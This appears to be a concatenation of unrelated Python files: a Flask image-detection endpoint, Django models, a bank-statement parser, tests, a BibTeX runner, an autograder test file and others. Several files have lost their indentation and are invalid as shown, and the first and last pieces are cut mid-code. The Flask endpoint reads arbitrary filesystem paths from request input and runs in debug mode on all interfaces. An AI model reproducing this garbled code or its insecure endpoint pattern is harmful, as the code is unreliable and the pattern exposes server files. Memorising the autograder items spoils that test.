# f.write(
# labels.get(obj.id, obj.id) +
# "\n score: %s\n--\n" % obj.score
# )
print(labels.get(obj.id, obj.id))
#print(' id: ', obj.id)
print(' score: ', obj.score)
#print(' bbox: ', obj.bbox)
#if output != None:
# image = image.convert('RGB')
# draw_objects(ImageDraw.Draw(image), objs, labels)
#image=cv2.cvtColor(image,cv2.COLOR_BGR2RGB)
#np_img = Image.fromarray(image)
#byte_io = BytesIO()
#os.system("sudo chmod 777 ./results")
#spliting filename from extension
# split_filename = filename.split(".", 1)
# image.save(path+"results/"+split_filename[0]+"-annnotated.png", format='PNG')
print("The average inference time over "+str(no_files)+" image files is:")
print ('%.7fms' % (summ / no_files))
# print ('%.7f' % (summ / 100))
labelsPath = "models/coco_labels.txt"
modelPath = "models/mobilenet_ssd_v2_coco_quant_postprocess.tflite"
#initializing the flask app
app = Flask(__name__)
#routing http posts to this method
@app.route('/api/detect', methods=['POST', 'GET'])
def main():
#img = request.files["image"].read()
#image = Image.open(io.BytesIO(img))
#data_input = request.args['input']
data_input = request.values.get('input')
output = request.values.get('output')
#output = request.form.get('output')
path = data_input
filename_image = {}
input_format = ["jpg", "png", "jpeg"]
if data_input.find(".") != -1:
print(data_input + " is a file")
split_data_input = data_input.split(".", 1)
if data_input.endswith(tuple(input_format)):
print("INPUT FORMAT: %s IS VALID" % split_data_input[1])
path_splitted = []
path_splitted = re.split('/', data_input)
filename = path_splitted[len(path_splitted)-1]
filename_image[filename] = Image.open(data_input)
path = os.path.dirname(data_input)+"/"
else:
print(data_input + " is a path with the following files: ")
for filename in os.listdir(data_input):
image_path = data_input + filename
filename_image[filename] = Image.open(image_path)
print(" " + filename)
detection_loop(filename_image, path, output)
status_code = Response(status = 200)
return status_code
# image=cv2.imread(args.input)
# image=cv2.cvtColor(image,cv2.COLOR_BGR2RGB)
if __name__ == '__main__':
app.run(debug = True, host = '0.0.0.0')
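# Illustrative request against the endpoint above (a sketch; Flask serves on its
# default port 5000, and 'input' may be a single image file or a directory path):
#   curl -X POST -d "input=/path/to/images/" -d "output=results" http://localhost:5000/api/detect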
|
from django.db import models
from django.contrib.auth import get_user_model
# Create your models here.
User = get_user_model()
class Follow(models.Model):
from_user = models.ForeignKey(User,
on_delete=models.CASCADE,
related_name="following")
to_user = models.ForeignKey(User,
on_delete=models.CASCADE,
related_name="followers")
status = models.BooleanField(default=True)
def __str__(self):
return f"{self.from_user} => {self.to_user}"
|
import exceptions, os
from pypy.tool import slaveproc
class IsolateException(Exception):
pass
class IsolateInvoker(object):
# to have a nice repr
def __init__(self, isolate, name):
self.isolate = isolate
self.name = name
def __call__(self, *args):
return self.isolate._invoke(self.name, args)
def __repr__(self):
return "<invoker for %r . %r>" % (self.isolate.module, self.name)
def close_isolate(self):
self.isolate._close()
class Isolate(object):
"""
Isolate lets load a module in a different process,
and support invoking functions from it passing and
returning simple values
module: a dotted module name or a tuple (directory, module-name)
"""
_closed = False
def __init__(self, module):
self.module = module
self.slave = slaveproc.SlaveProcess(os.path.join(os.path.dirname(__file__),
'isolate_slave.py'))
res = self.slave.cmd(('load', module))
assert res == 'loaded'
def __getattr__(self, name):
return IsolateInvoker(self, name)
def _invoke(self, func, args):
status, value = self.slave.cmd(('invoke', (func, args)))
print 'OK'
if status == 'ok':
return value
else:
exc_type_module, exc_type_name = value
if exc_type_module == 'exceptions':
raise getattr(exceptions, exc_type_name)
else:
raise IsolateException, "%s.%s" % value
def _close(self):
if not self._closed:
self.slave.close()
self._closed = True
def __del__(self):
self._close()
def close_isolate(isolate):
assert isinstance(isolate, Isolate)
isolate._close()
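# Illustrative usage (a sketch; loads the standard-library 'math' module in a
# slave process and invokes a function in it):
#   iso = Isolate('math')
#   assert iso.sqrt(4.0) == 2.0
#   close_isolate(iso)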
|
from datetime import datetime, date
from decimal import Decimal
from typing import Tuple, Any, Optional, Dict
from django.conf import settings
from django.core.exceptions import ValidationError
from django.db import transaction
from django.utils.dateparse import parse_date
from django.utils.translation import gettext as _
from jacc.models import Account, EntryType
from jutil.format import dec2, dec4
from jutil.parse import parse_datetime
from jbank.models import (
StatementFile,
Statement,
StatementRecord,
DELIVERY_FROM_BANK_SYSTEM,
StatementRecordDetail,
CurrencyExchange,
StatementRecordRemittanceInfo,
CurrencyExchangeSource,
)
from jbank.parsers import parse_filename_suffix
from jutil.xml import xml_to_dict
CAMT053_STATEMENT_SUFFIXES = ("XML", "XT", "CAMT", "NDCAMT53L")
CAMT053_ARRAY_TAGS = ["Bal", "Ntry", "NtryDtls", "TxDtls", "Strd"]
CAMT053_INT_TAGS = ["NbOfNtries", "NbOfTxs"]
def camt053_get_iban(data: dict) -> str:
return data.get("BkToCstmrStmt", {}).get("Stmt", {}).get("Acct", {}).get("Id", {}).get("IBAN", "")
def camt053_get_val(data: dict, key: str, default: Any = None, required: bool = True, name: str = "") -> Any:
if key not in data:
if required:
raise ValidationError(_("camt.053 field {} missing").format(name if name else key))
return default
return data[key]
def camt053_get_str(data: dict, key: str, default: str = "", required: bool = True, name: str = "") -> str:
return str(camt053_get_val(data, key, default, required, name))
def camt053_get_currency(data: dict, key: str, required: bool = True, name: str = "") -> Tuple[Optional[Decimal], str]:
try:
v = camt053_get_val(data, key, default=None, required=False, name=name)
if v is not None:
amount = dec2(v["@"])
currency_code = v["@Ccy"]
return amount, currency_code
except Exception:
pass
if required:
raise ValidationError(_("camt.053 field {} type {} missing or invalid").format(name, "currency"))
return None, ""
def camt053_get_dt(data: Dict[str, Any], key: str, name: str = "") -> datetime:
s = camt053_get_val(data, key, None, True, name)
val = parse_datetime(s)
if val is None:
raise ValidationError(_("camt.053 field {} type {} missing or invalid").format(name, "datetime") + ": {}".format(s))
return val
def camt053_get_int(data: Dict[str, Any], key: str, name: str = "") -> int:
s = camt053_get_val(data, key, None, True, name)
try:
return int(s)
except Exception:
pass
raise ValidationError(_("camt.053 field {} type {} missing or invalid").format(name, "int"))
def camt053_get_int_or_none(data: Dict[str, Any], key: str, name: str = "") -> Optional[int]:
s = camt053_get_val(data, key, None, False, name)
if s is None:
return None
try:
return int(s)
except Exception:
pass
raise ValidationError(_("camt.053 field {} type {} missing or invalid").format(name, "int"))
def camt053_get_date(data: dict, key: str, default: Optional[date] = None, required: bool = True, name: str = "") -> date:
s = camt053_get_val(data, key, default, required, name)
try:
val = parse_date(s[:10])
if val is None:
raise ValidationError(_("camt.053 field {} type {} missing or invalid").format(name, "date"))
assert isinstance(val, date)
return val
except Exception:
pass
raise ValidationError(_("camt.053 field {} type {} missing or invalid").format(name, "date") + ": {}".format(s))
def camt053_parse_statement_from_file(filename: str) -> dict:
if parse_filename_suffix(filename).upper() not in CAMT053_STATEMENT_SUFFIXES:
raise ValidationError(
_('File {filename} has unrecognized ({suffixes}) suffix for file type "{file_type}"').format(
filename=filename, suffixes=", ".join(CAMT053_STATEMENT_SUFFIXES), file_type="camt.053"
)
)
with open(filename, "rb") as fp:
data = xml_to_dict(fp.read(), array_tags=CAMT053_ARRAY_TAGS, int_tags=CAMT053_INT_TAGS)
return data
def camt053_get_stmt_bal(d_stmt: dict, bal_type: str) -> Tuple[Decimal, Optional[date]]:
for bal in d_stmt.get("Bal", []):
if bal.get("Tp", {}).get("CdOrPrtry", {}).get("Cd", "") == bal_type:
amt = Decimal(bal.get("Amt", {}).get("@", ""))
dt_data = bal.get("Dt", {})
dt = None
if "Dt" in dt_data:
dt = camt053_get_date(dt_data, "Dt", name="Stmt.Bal[{}].Dt.Dt".format(bal_type))
return amt, dt
raise ValidationError(_("camt.053 field {} type {} missing or invalid").format("Stmt.Bal.Tp.CdOrPrty.Cd", bal_type))
def camt053_domain_from_record_code(record_domain: str) -> str:
if record_domain == "PMNT":
return "700"
if record_domain == "LDAS":
return "761"
return ""
def camt053_get_unified_val(qs, k: str, default: Any) -> Any:
v = default
for e in qs:
v2 = getattr(e, k)
if v == default:
v = v2
elif v and v2 and v2 != v:
return default
return v
def camt053_get_unified_str(qs, k: str) -> str:
return camt053_get_unified_val(qs, k, "")
@transaction.atomic # noqa
def camt053_create_statement(statement_data: dict, name: str, file: StatementFile, **kw) -> Statement: # noqa
"""
Creates camt.053 Statement from statement data parsed by camt053_parse_statement_from_file()
:param statement_data: XML data in form of dict
:param name: File name of the account statement
:param file: Source statement file
:return: Statement
"""
account_number = camt053_get_iban(statement_data)
if not account_number:
raise ValidationError("{name}: ".format(name=name) + _("account.not.found").format(account_number=""))
accounts = list(Account.objects.filter(name=account_number))
if len(accounts) != 1:
raise ValidationError("{name}: ".format(name=name) + _("account.not.found").format(account_number=account_number))
account = accounts[0]
assert isinstance(account, Account)
d_stmt = statement_data.get("BkToCstmrStmt", {}).get("Stmt", {})
if not d_stmt:
raise ValidationError(_("camt.053 field {} type {} missing or invalid").format("Stmt", "element"))
d_acct = d_stmt.get("Acct", {})
d_ownr = d_acct.get("Ownr", {})
d_ntry = d_stmt.get("Ntry", [])
d_frto = d_stmt.get("FrToDt", {})
d_txsummary = d_stmt.get("TxsSummry", {})
if Statement.objects.filter(name=name, account=account).first():
raise ValidationError("Bank account {} statement {} of processed already".format(account_number, name))
stm = Statement(name=name, account=account, file=file)
stm.account_number = stm.iban = account_number
stm.bic = camt053_get_str(d_acct.get("Svcr", {}).get("FinInstnId", {}), "BIC", name="Stmt.Acct.Svcr.FinInstnId.BIC")
stm.statement_identifier = camt053_get_str(d_stmt, "Id", name="Stmt.Id")
stm.statement_number = camt053_get_str(d_stmt, "LglSeqNb", name="Stmt.LglSeqNb")
stm.record_date = camt053_get_dt(d_stmt, "CreDtTm", name="Stmt.CreDtTm")
    stm.begin_date = camt053_get_dt(d_frto, "FrDtTm", name="Stmt.FrToDt.FrDtTm").date()
    stm.end_date = camt053_get_dt(d_frto, "ToDtTm", name="Stmt.FrToDt.ToDtTm").date()
stm.currency_code = camt053_get_str(d_acct, "Ccy", name="Stmt.Acct.Ccy")
if stm.currency_code != account.currency:
raise ValidationError(
_(
"Account currency {account_currency} does not match statement entry currency {statement_currency}".format(
statement_currency=stm.currency_code, account_currency=account.currency
)
)
)
    stm.owner_name = camt053_get_str(d_ownr, "Nm", name="Stmt.Acct.Ownr.Nm")
stm.begin_balance, stm.begin_balance_date = camt053_get_stmt_bal(d_stmt, "OPBD")
if stm.begin_balance_date is None:
stm.begin_balance_date = stm.begin_date
stm.record_count = camt053_get_int_or_none(d_txsummary.get("TtlNtries", {}), "NbOfNtries", name="Stmt.TxsSummry.TtlNtries.NbOfNtries") or 0
stm.bank_specific_info_1 = camt053_get_str(d_stmt, "AddtlStmtInf", required=False)[:1024]
for k, v in kw.items():
setattr(stm, k, v)
stm.full_clean()
stm.save()
e_deposit = EntryType.objects.filter(code=settings.E_BANK_DEPOSIT).first()
if not e_deposit:
raise ValidationError(_("entry.type.missing") + " ({}): {}".format("settings.E_BANK_DEPOSIT", settings.E_BANK_DEPOSIT))
assert isinstance(e_deposit, EntryType)
e_withdraw = EntryType.objects.filter(code=settings.E_BANK_WITHDRAW).first()
if not e_withdraw:
raise ValidationError(_("entry.type.missing") + " ({}): {}".format("settings.E_BANK_WITHDRAW", settings.E_BANK_WITHDRAW))
assert isinstance(e_withdraw, EntryType)
e_types = {
"CRDT": e_deposit,
"DBIT": e_withdraw,
}
record_type_map = {
"CRDT": "1",
"DBIT": "2",
}
for ntry in d_ntry:
archive_id = ntry.get("AcctSvcrRef", "")
amount, cur = camt053_get_currency(ntry, "Amt", name="Stmt.Ntry[{}].Amt".format(archive_id))
if cur != account.currency:
raise ValidationError(
_(
"Account currency {account_currency} does not match statement entry currency {statement_currency}".format(
statement_currency=cur, account_currency=account.currency
)
)
)
cdt_dbt_ind = ntry["CdtDbtInd"]
e_type = e_types.get(cdt_dbt_ind, None)
if not e_type:
raise ValidationError(_("Statement entry type {} not supported").format(cdt_dbt_ind))
rec = StatementRecord(statement=stm, account=account, type=e_type)
rec.amount = amount
rec.archive_identifier = archive_id
rec.entry_type = record_type_map[cdt_dbt_ind]
        rec.record_date = record_date = camt053_get_date(ntry.get("BookgDt", {}), "Dt", name="Stmt.Ntry[{}].BookgDt.Dt".format(archive_id))
rec.value_date = camt053_get_date(ntry.get("ValDt", {}), "Dt", name="Stmt.Ntry[{}].ValDt.Dt".format(archive_id))
rec.delivery_method = DELIVERY_FROM_BANK_SYSTEM
d_bktxcd = ntry.get("BkTxCd", {})
d_domn = d_bktxcd.get("Domn", {})
d_family = d_domn.get("Fmly", {})
d_prtry = d_bktxcd.get("Prtry", {})
rec.record_domain = record_domain = camt053_get_str(d_domn, "Cd", name="Stmt.Ntry[{}].BkTxCd.Domn.Cd".format(archive_id))
rec.record_code = camt053_domain_from_record_code(record_domain)
rec.family_code = camt053_get_str(d_family, "Cd", name="Stmt.Ntry[{}].BkTxCd.Domn.Family.Cd".format(archive_id))
rec.sub_family_code = camt053_get_str(d_family, "SubFmlyCd", name="Stmt.Ntry[{}].BkTxCd.Domn.Family.SubFmlyCd".format(archive_id))
rec.record_description = camt053_get_str(d_prtry, "Cd", required=False)
rec.full_clean()
rec.save()
for dtl_batch in ntry.get("NtryDtls", []):
batch_identifier = dtl_batch.get("Btch", {}).get("MsgId", "")
dtl_ix = 0
for dtl in dtl_batch.get("TxDtls", []):
d = StatementRecordDetail(record=rec, batch_identifier=batch_identifier)
d_amt_dtl = dtl.get("AmtDtls", {})
d_txamt = d_amt_dtl.get("TxAmt", {})
d_xchg = d_txamt.get("CcyXchg", None)
d.amount, d.currency_code = camt053_get_currency(d_txamt, "Amt", required=False)
d.instructed_amount, source_currency = camt053_get_currency(d_amt_dtl.get("InstdAmt", {}), "Amt", required=False)
if (not d_xchg and source_currency and source_currency != d.currency_code) or (d_xchg and not source_currency):
raise ValidationError(_("Inconsistent Stmt.Ntry[{}].NtryDtls.TxDtls[{}].AmtDtls".format(archive_id, dtl_ix)))
if source_currency and source_currency != d.currency_code:
source_currency = camt053_get_str(d_xchg, "SrcCcy", default=source_currency, required=False)
target_currency = camt053_get_str(d_xchg, "TrgCcy", default=d.currency_code, required=False)
unit_currency = camt053_get_str(d_xchg, "UnitCcy", default="", required=False)
exchange_rate_str = camt053_get_str(d_xchg, "XchgRate", default="", required=False)
exchange_rate = dec4(exchange_rate_str) if exchange_rate_str else None
exchange_source = CurrencyExchangeSource.objects.get_or_create(name=account_number)[0]
d.exchange = CurrencyExchange.objects.get_or_create(
record_date=record_date,
source_currency=source_currency,
target_currency=target_currency,
unit_currency=unit_currency,
exchange_rate=exchange_rate,
source=exchange_source,
)[0]
d_refs = dtl.get("Refs", {})
d.archive_identifier = d_refs.get("AcctSvcrRef", "")
d.end_to_end_identifier = d_refs.get("EndToEndId", "")
d_parties = dtl.get("RltdPties", {})
d_dbt = d_parties.get("Dbtr", {})
d.debtor_name = d_dbt.get("Nm", "")
d_udbt = d_parties.get("UltmtDbtr", {})
d.ultimate_debtor_name = d_udbt.get("Nm", "")
d_cdtr = d_parties.get("Cdtr", {})
d.creditor_name = d_cdtr.get("Nm", "")
d_cdtr_acct = d_parties.get("CdtrAcct", {})
d_cdtr_acct_id = d_cdtr_acct.get("Id", {})
d.creditor_account = d_cdtr_acct_id.get("IBAN", "")
if d.creditor_account:
d.creditor_account_scheme = "IBAN"
else:
d_cdtr_acct_id_othr = d_cdtr_acct_id.get("Othr") or {}
d.creditor_account_scheme = d_cdtr_acct_id_othr.get("SchmeNm", {}).get("Cd", "")
d.creditor_account = d_cdtr_acct_id_othr.get("Id") or ""
d_rmt = dtl.get("RmtInf", {})
d.unstructured_remittance_info = d_rmt.get("Ustrd", "")
d_rltd_dts = dtl.get("RltdDts", {})
d.paid_date = camt053_get_dt(d_rltd_dts, "AccptncDtTm") if "AccptncDtTm" in d_rltd_dts else None
d.full_clean()
d.save()
st = StatementRecordRemittanceInfo(detail=d)
for strd in d_rmt.get("Strd", []):
additional_info = strd.get("AddtlRmtInf", "")
has_additional_info = bool(additional_info and st.additional_info)
amount, currency_code = camt053_get_currency(strd.get("RfrdDocAmt", {}), "RmtdAmt", required=False)
has_amount = bool(amount and st.amount)
reference = strd.get("CdtrRefInf", {}).get("Ref", "")
has_reference = bool(reference and st.reference)
# check if new remittance info record is needed
if has_additional_info or has_amount or has_reference:
st = StatementRecordRemittanceInfo(detail=d)
if additional_info:
st.additional_info = additional_info
if amount:
st.amount, st.currency_code = amount, currency_code
if reference:
st.reference = reference
st.full_clean()
st.save()
dtl_ix += 1
# fill record name from details
assert rec.type
if not rec.name:
if rec.type.code == e_withdraw.code:
rec.name = camt053_get_unified_str(rec.detail_set.all(), "creditor_name")
elif rec.type.code == e_deposit.code:
rec.name = camt053_get_unified_str(rec.detail_set.all(), "debtor_name")
if not rec.recipient_account_number:
rec.recipient_account_number = camt053_get_unified_str(rec.detail_set.all(), "creditor_account")
if not rec.remittance_info:
rec.remittance_info = camt053_get_unified_str(StatementRecordRemittanceInfo.objects.all().filter(detail__record=rec), "reference")
if not rec.paid_date:
paid_date = camt053_get_unified_val(rec.detail_set.all(), "paid_date", default=None)
if paid_date:
assert isinstance(paid_date, datetime)
rec.paid_date = paid_date.date()
rec.full_clean()
rec.save()
return stm
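# Hedged usage sketch (not part of the original module): importing a camt.053 file
# inside a Django project where jbank is installed. The file path, statement name
# and StatementFile instance are assumed to be supplied by the caller.
def _example_import_camt053(filename: str, name: str, statement_file: StatementFile) -> Statement:
    """Parse a camt.053 XML file and persist it as a Statement (illustrative only)."""
    statement_data = camt053_parse_statement_from_file(filename)
    return camt053_create_statement(statement_data, name=name, file=statement_file)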
|
from dataclasses import dataclass, field
from enum import Enum
from typing import Optional
__NAMESPACE__ = "NISTSchema-SV-IV-atomic-unsignedByte-enumeration-5-NS"
class NistschemaSvIvAtomicUnsignedByteEnumeration5Type(Enum):
VALUE_1 = 1
VALUE_21 = 21
VALUE_55 = 55
VALUE_9 = 9
VALUE_132 = 132
VALUE_255 = 255
VALUE_17 = 17
@dataclass
class NistschemaSvIvAtomicUnsignedByteEnumeration5:
class Meta:
name = "NISTSchema-SV-IV-atomic-unsignedByte-enumeration-5"
namespace = "NISTSchema-SV-IV-atomic-unsignedByte-enumeration-5-NS"
value: Optional[NistschemaSvIvAtomicUnsignedByteEnumeration5Type] = field(
default=None,
metadata={
"required": True,
}
)
|
# setup.py
import configparser
import os
import const
config = configparser.RawConfigParser()
setup_path = os.path.dirname(os.path.realpath(__file__))
config.read(setup_path + '/config.ini')
config = config[const.DEFAULT]
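# Illustrative sketch only (not part of the original file): assuming const.DEFAULT
# names a section such as "DEFAULT", a minimal config.ini next to setup.py could be:
#
#   [DEFAULT]
#   host = localhost
#   port = 8080
#
# after which individual values are read as, e.g., config.get('host').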
|
# Challenge 8 ("Desafio 8"): write a program that reads a value in meters and displays it converted to centimeters and millimeters
print('{:=^20}'.format('Desafio 8'))
metros = float(input('How many meters? '))
KM = metros / 1000
hm = metros / 100
decam = metros / 10
diam = metros * 10
cent = metros * 100
mili = metros * 1000
print('Converting {}m to other units:\n {:.3f} km\n {:.2f} hectometers\n {:.1f} decameters\n {:.0f} decimeters\n {:.0f} cm\n {:.0f} mm'.format(metros, KM, hm, decam, diam, cent, mili))
|
import json
import datetime
from bson import json_util
from tests.TestingSuite import BaseTestingSuite
class TestIotUpdateResource(BaseTestingSuite):
def setUp(self):
print("Testing Iot Update resources...")
super().setUp()
def test_successful_iot_entry(self):
new_entry = {
'timestamp': datetime.datetime.now().isoformat(),
'building': "test building",
'building_id': "test id",
'count': 10,
'endpoint': "test endpoint",
'endpoint_id':"test endpoint id",
'room_capacity': 50
}
response = self.app.post('/api/data/iot/update',
headers={
'Content-Type': 'application/json'
},
data=json.dumps(new_entry,
default=json_util.default))
self.assertEqual(f'New entry was added successfully {new_entry["count"]}', response.json['message'])
self.assertEqual(200, response.status_code)
def test_bad_schema_error(self):
new_entry = {
'timestamp': datetime.datetime.now().isoformat(),
'building': "test building",
# 'building_id': "test id",
'count': 10,
'endpoint': "test endpoint",
'endpoint_id':"test endpoint id",
'room_capacity': 50
}
response = self.app.post('/api/data/iot/update',
headers={
'Content-Type': 'application/json'
},
data=json.dumps(new_entry,
default=json_util.default))
self.assertEqual('Request is missing required fields.', response.json['message'])
self.assertEqual(400, response.status_code)
|
#!/usr/bin/env python3
from argparse import ArgumentParser
from glob import glob
from os import path
from subprocess import run, CalledProcessError
from tempfile import TemporaryDirectory
from zipfile import ZipFile, BadZipFile
from database.connection_manager import get_connection
from database.database_config import load_config
from database.sqlqueries.insert_queries import INSERT_LOG_ANALYSIS
from database.sqlqueries.table_queries import (
STRING_SCHEMA,
QF_SQ_SCHEMA,
Q_SQ_SCHEMA,
SCHEMA_PLACEHOLDER,
SOLVER_PLACEHOLDER,
)
class LogAnalysisResult:
def __init__(self, res):
self.result = res
self.model_confirmed = "unkown"
self.unsat_core_confirmed = "unknown"
def unzip_folder(zipped_folder, name, fixing=False):
print("unzipping")
try:
with ZipFile(zipped_folder, "r") as zipped:
zipped.extractall(name)
except BadZipFile:
print("Problem due to bad zip file state with:", name)
if fixing:
outname = path.join(name, "fixed.zip")
try:
run(
" ".join(
["yes", "|", "zip", "-FF", zipped_folder, "--out", outname]
),
check=True,
shell=True,
)
except CalledProcessError:
print("Cannot fix")
unzip_folder(outname, name)
def enumerate_logs(folder):
result = []
    print(path.join(folder, "**", "*.log"))
for file in glob(path.join(folder, "**", "*.log"), recursive=True):
result.append(process_file(file))
return result
def analyze_logs(zipped_logs, schema, fixing=False):
SQ = schema.upper() == "SQ"
for file in glob(path.join(zipped_logs, "*logfiles.zip")):
basename = path.basename(file).split(".")[0]
runtime = path.basename(file).split(".")[-3]
print(runtime, file)
runtime_parts = runtime.split("_")
runtime = runtime_parts[0] + " " + runtime_parts[1].replace("-", ":")
print(basename, file)
solver, benchmark = basename.split("_", 1)
print(
f"benchmark: {benchmark}",
benchmark.startswith("QF_"),
schema,
schema.upper(),
schema.upper() == "SQ",
)
if SQ and benchmark.startswith("QF_"):
schema = QF_SQ_SCHEMA
elif SQ:
schema = Q_SQ_SCHEMA
print(f"Going to insert into schema: {schema}")
if solver.upper() == "ABC-SMT":
solver = "ABC"
if solver == "cvc5-problems":
solver = "CVC4"
solver = solver.replace("-", "_")
print(file, solver, benchmark)
with TemporaryDirectory() as tmpFolder:
unzip_folder(file, tmpFolder, fixing)
result_rows = enumerate_logs(tmpFolder)
with get_connection(load_config()) as conn:
with conn.cursor() as cursor:
for name, status, model_confirmed, unsat_core_confirmed in result_rows:
try:
bid = int(name.split("_", 1)[0])
except ValueError:
print("error extracting benchmark id from:", name, "skipped")
continue
query = INSERT_LOG_ANALYSIS.replace(
SCHEMA_PLACEHOLDER, schema
).replace(SOLVER_PLACEHOLDER, solver.upper())
cursor.execute(
query,
(
bid,
status,
model_confirmed,
unsat_core_confirmed,
benchmark,
runtime,
),
)
conn.commit()
def process_file(file):
with open(file) as inputfile:
status = LogAnalysisResult("unknown")
for line in inputfile:
line = line.strip()
if line == "RESULT: UNSAT" or line == "unsat":
status.result = "false"
elif line == "RESULT: SAT" or line == "sat":
status.result = "true"
elif line == "EVALUATED: true":
status.model_confirmed = "true"
elif line == "EVALUATED: false":
status.model_confirmed = "false"
elif line == "Checking unsat core":
status.unsat_core_confirmed = "false"
elif line == "UNSAT Core confirmed":
status.unsat_core_confirmed = "true"
elif (
line.startswith("(error ")
and line != '(error "no model available")'
and line
!= '(error "Cannot get model unless immediately preceded by SAT/NOT_ENTAILED or UNKNOWN response.")'
and not "model is not available" in line
and not "check annotation that says sat" in line
):
if status:
status.result = "ERROR (overwritten)"
else:
status.result = "ERROR"
elif line.startswith("*** Check failure stack trace: ***"):
status.result = "ERROR"
elif line.startswith(
'Exception in thread "main" java.lang.OutOfMemoryError'
):
status.result = "Out Of Memory"
elif line.startswith("Timeout in process Solver"):
status.result = "TIMEOUT"
problem_name = ".".join(path.basename(file).split(".")[1:-2])
return (
problem_name,
status.result,
status.model_confirmed,
status.unsat_core_confirmed,
)
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument("-i", "--logfile-folder", required=True)
parser.add_argument("-s", "--schema", required=True)
parser.add_argument("--fix-broken", action="store_true")
args = vars(parser.parse_args())
print(args)
analyze_logs(args["logfile_folder"], args["schema"], args["fix_broken"])
|
from django.db import models
from django.conf import settings
class Note(models.Model):
    author = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='notes', on_delete=models.CASCADE)
subject = models.CharField(max_length=100)
note = models.TextField(blank=True,null=True)
|
#!/usr/bin/env python
# Copyright (c) 2006-2019 Andrey Golovigin
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from __future__ import print_function, unicode_literals, with_statement
import re
import sys
from os import path
from shutil import rmtree
from subprocess import PIPE, Popen
from tempfile import mkdtemp
from pybtex.database import BibliographyData, Entry, Person
from pybtex.database.output import bibtex
from pybtex.errors import report_error
from pybtex.exceptions import PybtexError
writer = bibtex.Writer(encoding='ascii')
def write_aux(filename, citations):
with open(filename, 'w') as aux_file:
for citation in citations:
aux_file.write('\\citation{%s}\n' % citation)
aux_file.write('\\bibdata{test}\n')
aux_file.write('\\bibstyle{test}\n')
def write_bib(filename, database):
writer.write_file(database, filename)
def write_bst(filename, style):
with open(filename, 'w') as bst_file:
bst_file.write(style)
bst_file.write('\n')
def run_bibtex(style, database, citations=None):
if citations is None:
citations = list(database.entries.keys())
tmpdir = mkdtemp(prefix='pybtex_test_')
try:
write_bib(path.join(tmpdir, 'test.bib'), database)
write_aux(path.join(tmpdir, 'test.aux'), citations)
write_bst(path.join(tmpdir, 'test.bst'), style)
bibtex = Popen(('bibtex', 'test'), cwd=tmpdir, stdout=PIPE, stderr=PIPE)
stdout, stderr = bibtex.communicate()
if bibtex.returncode:
report_error(PybtexError(stdout))
with open(path.join(tmpdir, 'test.bbl')) as bbl_file:
result = bbl_file.read()
return result
    finally:
        rmtree(tmpdir)
def execute(code, database=None):
if database is None:
database = BibliographyData(entries={'test_entry': Entry('article')})
bst = """
ENTRY {name format} {} {}
FUNCTION {article}
{
%s write$ newline$
}
READ
ITERATE {call.type$}
""".strip() % code
result = ' '.join(run_bibtex(bst, database).splitlines())
return result
def format_name(name, format):
return execute('"%s" #1 "%s" format.name$' % (name, format))
def parse_name(name):
    space = re.compile(r'[\s~]+')
formatted_name = format_name(name, '{ff}|{vv}|{ll}|{jj}')
parts = [space.sub(' ', part.strip()) for part in formatted_name.split('|')]
first, von, last, junior = parts
return Person(first=first, prelast=von, last=last, lineage=junior)
def main():
    args = sys.argv[1:]
if len(args) != 1:
print("usage: run_bibtex 'some bibtex code'")
sys.exit(1)
code = args[0]
print(execute(code))
if __name__ == '__main__':
main()
|
from Utils.string_utils import clear_spaces as clear
def test_validation_all_contacts_info(app, db):
ui_contacts_list = app.contact.get_contact_list()
db_contacts_list = db.get_contact_list()
assert len(ui_contacts_list) == len(db_contacts_list)
for ui_contact in ui_contacts_list:
db_contact = next(filter(lambda x: x.contact_id == ui_contact.contact_id, db_contacts_list), None)
assert db_contact is not None
assert clear(ui_contact.first_name) == clear(db_contact.first_name)
assert clear(ui_contact.last_name) == clear(db_contact.last_name)
assert clear(ui_contact.address) == clear(db_contact.address)
assert clear(ui_contact.all_emails_from_home_page) == clear(db_contact.merge_emails_like_on_home_page(False))
assert clear(ui_contact.all_phones_from_home_page) == clear(db_contact.merge_phones_like_on_home_page())
|
test = {
'name': 'Question 11',
'points': 2,
'suites': [
{
'cases': [
{
'code': r"""
>>> swap_strategy(12, 60, 8, 6)
962aea5f59fc55bd65ccacf4603c8f22
# locked
""",
'hidden': False,
'locked': True
},
{
'code': r"""
>>> swap_strategy(30, 54, 8, 6)
327b19ffebddf93982e1ad2a4a6486f4
# locked
""",
'hidden': False,
'locked': True
},
{
'code': r"""
>>> swap_strategy(7, 24, 8, 6)
6
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> swap_strategy(7, 28, 8, 6)
0
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> from tests.check_strategy import check_strategy
>>> check_strategy(swap_strategy)
""",
'hidden': False,
'locked': False
}
],
'scored': True,
'setup': r"""
>>> from hog import *
""",
'teardown': '',
'type': 'doctest'
},
{
'cases': [
{
'code': r"""
>>> swap_strategy(10, 28, 8, 6) # beneficial
0
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> swap_strategy(9, 1, 8, 6)
6
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> swap_strategy(44, 24, 8, 6)
6
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> swap_strategy(37, 24, 8, 6)
6
""",
'hidden': False,
'locked': False
}
],
'scored': True,
'setup': r"""
>>> from hog import *
""",
'teardown': '',
'type': 'doctest'
}
]
}
|
class BackendPortPortNumber(object):
def read_get(self, name, idx_name, unity_client):
